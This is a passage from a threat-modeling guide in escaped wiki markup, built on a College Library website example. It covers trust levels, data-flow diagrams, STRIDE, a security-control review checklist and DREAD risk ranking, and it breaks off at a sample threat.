&amp;lt;td&amp;gt;This is the ability to execute SQL. Select, insert, and update queries on the database and thus have read and write access to any information stored within the College Library database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Website&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Session&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the login session of a user to the College Library website. This user could be a student, a member of the college faculty, or a Librarian.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to the Database Server&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to the database server allows you to administer the database, giving you full access to the database users and all data contained within the database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Create Users&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The ability to create users would allow an individual to create new users on the system. These could be student users, faculty member users, and librarian users.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to Audit Data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The audit data shows all audit-able events that occurred within the College Library application by students, staff, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(6) Website Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Trust Levels==&lt;br /&gt;
Trust levels represent the access rights that the application will grant to external entities. The trust levels are cross referenced with the entry points and assets. This allows us to define the access rights or privileges required at each entry point, and those required to interact with each asset. Trust levels are documented in the threat model as follows: &lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique number is assigned to each trust level. This is used to cross reference the trust level with the entry points and assets.&lt;br /&gt;
# '''Name''' - A descriptive name that allows you to identify the external entities that have been granted this trust level.&lt;br /&gt;
# '''Description''' - A textual description of the trust level detailing the external entity who has been granted the trust level.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;70%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Anonymous Web User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website but has not provided valid credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User with Valid Login Credentials&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website and has logged in using valid login credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User with Invalid Login Credentials&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website and is attempting to log in using invalid login credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The librarian can create users on the library website and view their personal information.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;5&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Server Administrator&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database server administrator has read and write access to the database that is used by the college library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Website Administrator&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The Website administrator can configure the college library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;7&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Web Server User Process&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the process/user that the web server executes code as and authenticates itself against the database server as.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Read User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database user account used to access the database for read access.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;9&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Read/Write User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database user account used to access the database for read and write access.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Data Flow Diagrams==&lt;br /&gt;
All of the information collected allows us to accurately model the application through the use of Data Flow Diagrams (DFDs). The DFDs will allow us to gain a better understanding of the application by providing a visual representation of how the application processes data. The focus of the DFDs is on how data moves through the application and what happens to the data as it moves. DFDs are hierarchical in structure, so they can be used to decompose the application into subsystems and lower-level subsystems. The high level DFD will allow us to clarify the scope of the application being modeled. The lower level iterations will allow us to focus on the specific processes involved when processing specific data. There are a number of symbols that are used in DFDs for threat modeling. These are described below:&lt;br /&gt;
&lt;br /&gt;
'''External Entity'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The external entity shape is used to represent any entity outside the application that interacts with the application via an entry point.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_external_entity.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Process'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The process shape represents a task that handles data within the application. The task may process the data or perform an action based on the data.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_process.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Multiple Process'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The multiple process shape is used to present a collection of subprocesses. The multiple process can be broken down into its subprocesses in another DFD.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_multiple_process.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Data Store'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The data store shape is used to represent locations where data is stored. Data stores do not modify the data, they only store data.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_data_store.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Data Flow'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The data flow shape represents data movement within the application. The direction of the data movement is represented by the arrow.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_data_flow.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
'''Privilege Boundary'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The privilege boundary shape is used to represent the change of privilege levels as the data flows through the application.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_privilge_boundary.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example===&lt;br /&gt;
&amp;lt;br/&amp;gt; '''Data Flow Diagram for the College Library Website'''&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:Data flow1.jpg]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
'''User Login Data Flow Diagram for the College Library Website'''&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:Data flow2.jpg]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Determine and Rank Threats ==&lt;br /&gt;
===Threat Categorization===&lt;br /&gt;
The first step in the determination of threats is adopting a threat categorization. A threat categorization provides a set of threat categories with corresponding examples so that threats can be systematically identified in the application in a structured and repeatable manner. &lt;br /&gt;
&lt;br /&gt;
====STRIDE====&lt;br /&gt;
A threat categorization such as STRIDE is useful in the identification of threats by classifying attacker goals such as:&lt;br /&gt;
*Spoofing&lt;br /&gt;
*Tampering&lt;br /&gt;
*Repudiation&lt;br /&gt;
*Information Disclosure&lt;br /&gt;
*Denial of Service&lt;br /&gt;
*Elevation of Privilege.&lt;br /&gt;
&lt;br /&gt;
A threat list of generic threats organized in these categories with examples and the affected security controls is provided in the following table:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;STRIDE Threat List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Examples&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Security Control&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Spoofing&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to illegally access and use another user's credentials, such as username and password.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authentication&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Tampering&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to maliciously change/modify persistent data, such as persistent data in a database, and the alteration of data in transit between two computers over an open network, such as the Internet.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Integrity&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Repudiation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to perform illegal operations in a system that lacks the ability to trace the prohibited operations.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Non-Repudiation&amp;lt;/td&amp;gt; &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Information disclosure&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action to read a file that one was not granted access to, or to read data in transit. &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Confidentiality&amp;lt;/td&amp;gt; &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Denial of service&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat aimed to deny access to valid users, such as by making a web server temporarily unavailable or unusable. &lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Availability&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Elevation of privilege&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat aimed to gain privileged access to resources for gaining unauthorized access to information or to compromise a system.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authorization&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Security Controls==&lt;br /&gt;
Once the basic threat agents and business impacts are understood, the review team should try to identify the set of controls that could prevent these threat agents from causing those impacts.  The primary focus of the code review should be to ensure that these security controls are in place, that they work properly, and that they are correctly invoked in all the necessary places. The checklist below can help to ensure that all the likely risks have been considered.&lt;br /&gt;
&lt;br /&gt;
'''Authentication:'''&lt;br /&gt;
*Ensure all internal and external connections (user and entity) go through an appropriate and adequate form of authentication. Be assured that this control cannot be bypassed. &lt;br /&gt;
*Ensure all pages enforce the requirement for authentication. &lt;br /&gt;
*Ensure that whenever authentication credentials or any other sensitive information is passed, only accept the information via the HTTP “POST” method and will not accept it via the HTTP “GET” method. &lt;br /&gt;
*Any page deemed by the business or the development team as being outside the scope of authentication should be reviewed in order to assess any possibility of security breach. &lt;br /&gt;
*Ensure that authentication credentials do not traverse the wire in clear text form. &lt;br /&gt;
*Ensure development/debug backdoors are not present in production code. &lt;br /&gt;
&lt;br /&gt;
'''Authorization: '''&lt;br /&gt;
*Ensure that there are authorization mechanisms in place. &lt;br /&gt;
*Ensure that the application has clearly defined the user types and the rights of said users. &lt;br /&gt;
*Ensure there is a least privilege stance in operation. &lt;br /&gt;
*Ensure that the Authorization mechanisms work properly, fail securely, and cannot be circumvented. &lt;br /&gt;
*Ensure that authorization is checked on every request. &lt;br /&gt;
*Ensure development/debug backdoors are not present in production code. &lt;br /&gt;
&lt;br /&gt;
'''Cookie Management: '''&lt;br /&gt;
*Ensure that sensitive information is not comprised. &lt;br /&gt;
*Ensure that unauthorized activities cannot take place via cookie manipulation. &lt;br /&gt;
*Ensure that proper encryption is in use. &lt;br /&gt;
*Ensure secure flag is set to prevent accidental transmission over “the wire” in a non-secure manner. &lt;br /&gt;
*Determine if all state transitions in the application code properly check for the cookies and enforce their use. &lt;br /&gt;
*Ensure the session data is being validated. &lt;br /&gt;
*Ensure cookies contain as little private information as possible. &lt;br /&gt;
*Ensure entire cookie is encrypted if sensitive data is persisted in the cookie. &lt;br /&gt;
*Define all cookies being used by the application, their name, and why they are needed. &lt;br /&gt;
&lt;br /&gt;
'''Data/Input Validation: '''&lt;br /&gt;
*Ensure that a DV mechanism is present. &lt;br /&gt;
*Ensure all input that can (and will) be modified by a malicious user such as HTP headers, input fields, hidden fields, drop down lists, and other web components are properly validated. &lt;br /&gt;
*Ensure that the proper length checks on all input exist. &lt;br /&gt;
*Ensure that all fields, cookies, http headers/bodies, and form fields are validated. &lt;br /&gt;
*Ensure that the data is well formed and contains only known good chars if possible. &lt;br /&gt;
*Ensure that the data validation occurs on the server side. &lt;br /&gt;
*Examine where data validation occurs and if a centralized model or decentralized model is used. &lt;br /&gt;
*Ensure there are no backdoors in the data validation model. &lt;br /&gt;
*'''Golden Rule: All external input, no matter what it is, is examined and validated. '''&lt;br /&gt;
&lt;br /&gt;
'''Error Handling/Information leakage: '''&lt;br /&gt;
*Ensure that all method/function calls that return a value have proper error handling and return value checking. &lt;br /&gt;
*Ensure that exceptions and error conditions are properly handled. &lt;br /&gt;
*Ensure that no system errors can be returned to the user. &lt;br /&gt;
*Ensure that the application fails in a secure manner. &lt;br /&gt;
*Ensure resources are released if an error occurs. &lt;br /&gt;
&lt;br /&gt;
'''Logging/Auditing: '''&lt;br /&gt;
*Ensure that no sensitive information is logged in the event of an error. &lt;br /&gt;
*Ensure the payload being logged is of a defined maximum length and that the logging mechanism enforces that length. &lt;br /&gt;
*Ensure no sensitive data can be logged; e.g. cookies, HTTP “GET” method, authentication credentials. &lt;br /&gt;
*Examine if the application will audit the actions being taken by the application on behalf of the client (particularly data manipulation/Create, Update, Delete (CUD) operations). &lt;br /&gt;
*Ensure successful and unsuccessful authentication is logged. &lt;br /&gt;
*Ensure application errors are logged. &lt;br /&gt;
*Examine the application for debug logging with the view to logging of sensitive data. &lt;br /&gt;
&lt;br /&gt;
'''Cryptography: '''&lt;br /&gt;
*Ensure no sensitive data is transmitted in the clear, internally or externally. &lt;br /&gt;
*Ensure the application is implementing known good cryptographic methods. &lt;br /&gt;
&lt;br /&gt;
'''Secure Code Environment: '''&lt;br /&gt;
*Examine the file structure. Are any components that should not be directly accessible available to the user?&lt;br /&gt;
*Examine all memory allocations/de-allocations. &lt;br /&gt;
*Examine the application for dynamic SQL and determine if it is vulnerable to injection. &lt;br /&gt;
*Examine the application for “main()” executable functions and debug harnesses/backdoors &lt;br /&gt;
*Search for commented out code, commented out test code, which may contain sensitive information. &lt;br /&gt;
*Ensure all logical decisions have a default clause. &lt;br /&gt;
*Ensure no development environment kit is contained on the build directories. &lt;br /&gt;
*Search for any calls to the underlying operating system or file open calls and examine the error possibilities. &lt;br /&gt;
&lt;br /&gt;
'''Session Management: '''&lt;br /&gt;
*Examine how and when a session is created for a user, unauthenticated and authenticated. &lt;br /&gt;
*Examine the session ID and verify if it is complex enough to fulfill requirements regarding strength. &lt;br /&gt;
*Examine how sessions are stored: e.g. in a database, in memory etc. &lt;br /&gt;
*Examine how the application tracks sessions. &lt;br /&gt;
*Determine the actions the application takes if an invalid session ID occurs. &lt;br /&gt;
*Examine session invalidation. &lt;br /&gt;
*Determine how multithreaded/multi-user session management is performed. &lt;br /&gt;
*Determine the session HTTP inactivity timeout. &lt;br /&gt;
*Determine how the log-out functionality functions.&lt;br /&gt;
&lt;br /&gt;
==Threat Analysis==&lt;br /&gt;
The prerequisite in the analysis of threats is the understanding of the generic definition of risk that is the probability that a threat agent will exploit a vulnerability to cause an impact to the application. From the perspective of risk management, threat modeling is the systematic and strategic approach for identifying and enumerating threats to an application environment with the objective of minimizing risk and the associated impacts. &lt;br /&gt;
&lt;br /&gt;
Threat analysis as such is the identification of the threats to the application, and involves the analysis of each aspect of the application functionality and architecture and design to identify and classify potential weaknesses that could lead to an exploit. &lt;br /&gt;
&lt;br /&gt;
In the first threat modeling step, we have modeled the system showing data flows, trust boundaries, process components, and entry and exit points. An example of such modeling is shown in the Example: Data Flow Diagram for the College Library Website. &lt;br /&gt;
&lt;br /&gt;
Data flows show how data flows logically through the end to end, and allows the identification of affected components through critical points (i.e. data entering or leaving the system, storage of data) and the flow of control through these components. Trust boundaries show any location where the level of trust changes. Process components show where data is processed, such as web servers, application servers, and database servers. Entry points show where data enters the system (i.e. input fields, methods) and exit points are where it leaves the system (i.e. dynamic output, methods), respectively. Entry and exit points define a trust boundary. &lt;br /&gt;
&lt;br /&gt;
Threat lists based on the STRIDE model are useful in the identification of threats with regards to the attacker goals. For example, if the threat scenario is attacking the login, would the attacker brute force the password to break the authentication? If the threat scenario is to try to elevate privileges to gain another user’s privileges, would the attacker try to perform forceful browsing? &lt;br /&gt;
&lt;br /&gt;
It is vital that all possible attack vectors should be evaluated from the attacker’s point of view. For this reason, it is also important to consider entry and exit points, since they could also allow the realization of certain kinds of threats. For example, the login page allows sending authentication credentials, and the input data accepted by an entry point has to validate for potential malicious input to exploit vulnerabilities such as SQL injection, cross site scripting, and buffer overflows. Additionally, the data flow passing through that point has to be used to determine the threats to the entry points to the next components along the flow. If the following components can be regarded critical (e.g. the hold sensitive data), that entry point can be regarded more critical as well. In an end to end data flow, for example, the input data (i.e. username and password) from a login page, passed on without validation,  could be exploited for a SQL injection attack to manipulate a query for breaking the authentication or to modify a table in the database. &lt;br /&gt;
&lt;br /&gt;
Exit points might serve as attack points to the client (e.g. XSS vulnerabilities) as well for the realization of information disclosure vulnerabilities. For example, in the case of exit points from components handling confidential data (e.g. data access components), exit points lacking security controls to protect the confidentiality and integrity can lead to disclosure of such confidential information to an unauthorized user. &lt;br /&gt;
&lt;br /&gt;
In many cases threats enabled by exit points are related to the threats of the corresponding entry point. In the login example, error messages returned to the user via the exit point might allow for entry point attacks, such as account harvesting (e.g. username not found), or SQL injection (e.g. SQL exception errors). &lt;br /&gt;
&lt;br /&gt;
From the defensive perspective, the identification of threats driven by security control categorization such as ASF, allows a threat analyst to focus on specific issues related to weaknesses (e.g. vulnerabilities) in security controls. Typically the process of threat identification involves going through iterative cycles where initially all the possible threats in the threat list that apply to each component are evaluated. &lt;br /&gt;
&lt;br /&gt;
At the next iteration, threats are further analyzed by exploring the attack paths, the root causes (e.g. vulnerabilities, depicted as orange blocks) for the threat to be exploited, and the necessary mitigation controls (e.g. countermeasures, depicted as green blocks). A threat tree as shown in figure 2 is useful to perform such threat analysis &lt;br /&gt;
&lt;br /&gt;
[[Image:Threat_Graph.gif|Figure 2: Threat Graph]]&lt;br /&gt;
&lt;br /&gt;
Once common threats, vulnerabilities, and attacks are assessed, a more focused threat analysis should take in consideration use and abuse cases. By thoroughly analyzing the use scenarios, weaknesses can be identified that could lead to the realization of a threat. Abuse cases should be identified as part of the security requirement engineering activity. These abuse cases can illustrate how existing protective measures could be bypassed, or where a lack of such protection exists. A use and misuse case graph for authentication is shown in figure below:&lt;br /&gt;
&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg|Figure 3: Use and Misuse Case]]&lt;br /&gt;
&lt;br /&gt;
Finally, it is possible to bring all of this together by determining the types of threat to each component of the decomposed system. This can be done by using a threat categorization such as STRIDE or ASF, the use of threat trees to determine how the threat can be exposed by a vulnerability, and use and misuse cases to further validate the lack of a countermeasure to mitigate the threat.&lt;br /&gt;
&lt;br /&gt;
To apply STRIDE to the data flow diagram items the following table can be used: &lt;br /&gt;
&lt;br /&gt;
TABLE&lt;br /&gt;
&lt;br /&gt;
==Ranking of Threats==&lt;br /&gt;
Threats can be ranked from the perspective of risk factors. By determining the risk factor posed by the various identified threats, it is possible to create a prioritized list of threats to support a risk mitigation strategy, such as deciding on which threats have to be mitigated first. Different risk factors can be used to determine which threats can be ranked as High, Medium, or Low risk. In general, threat risk models use different factors to model risks such as those shown in figure below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Riskfactors.JPG|Figure 3: Risk Model Factors]]&lt;br /&gt;
&lt;br /&gt;
==DREAD==&lt;br /&gt;
In the Microsoft DREAD threat-risk ranking model, the technical risk factors for impact are Damage and Affected Users, while the ease of exploitation factors are Reproducibility, Exploitability and Discoverability. This risk factorization allows the assignment of values to the different influencing factors of a threat. To determine the ranking of a threat, the threat analyst has to answer basic questions for each factor of risk, for example: &lt;br /&gt;
&lt;br /&gt;
*For Damage: How big the damage can be?&lt;br /&gt;
*For Reproducibility: How easy is it to reproduce an attack to work?&lt;br /&gt;
*For Exploitability: How much time, effort, and expertise is needed to exploit the threat?&lt;br /&gt;
*For Affected Users: If a threat were exploited, what percentage of users would be affected?&lt;br /&gt;
*For Discoverability: How easy is it for an attacker to discover this threat?&lt;br /&gt;
&lt;br /&gt;
By referring to the college library website it is possible to document sample threats releated to the use cases such as: &lt;br /&gt;
&lt;br /&gt;
'''Threat: Malicious user views confidential information of students, faculty members and librarians.'''&lt;br /&gt;
